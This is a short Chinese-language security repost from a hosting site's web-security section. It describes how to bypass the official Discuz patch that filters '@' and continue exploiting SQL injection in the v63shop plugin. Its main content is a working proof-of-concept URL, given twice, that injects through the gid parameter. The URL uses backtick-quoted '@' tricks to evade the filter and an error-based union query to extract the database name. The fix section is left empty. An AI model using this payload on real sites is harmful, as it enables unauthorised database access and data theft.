鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

绕过Disucz的@过滤补丁继续注入

来源:互联网 作者:佚名 时间:2015-10-19 08:37
过滤字符串中的@,但是始终没有修复根本问题 官方的修复代码加了一个if判断 if(strpos($clean, @) !== false) { return -3; } 过滤字符串中的@,但是始终没有修复根本问题,用如下方法可以去掉$clean变量中的@ http://localhost/discuz/plugin.php?id=v63shop
过滤字符串中的@,但是始终没有修复根本问题
官方的修复代码加了一个if判断
 
 
if(strpos($clean, '@') !== false) {
return '-3';
}
 
过滤字符串中的@,但是始终没有修复根本问题,用如下方法可以去掉$clean变量中的@
 
 
http://localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`


PoC:
 
 
 
 
http://localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`
 
 
 
附截图:
 
 
 
修复方案:

。。。。 
 
网友评论
<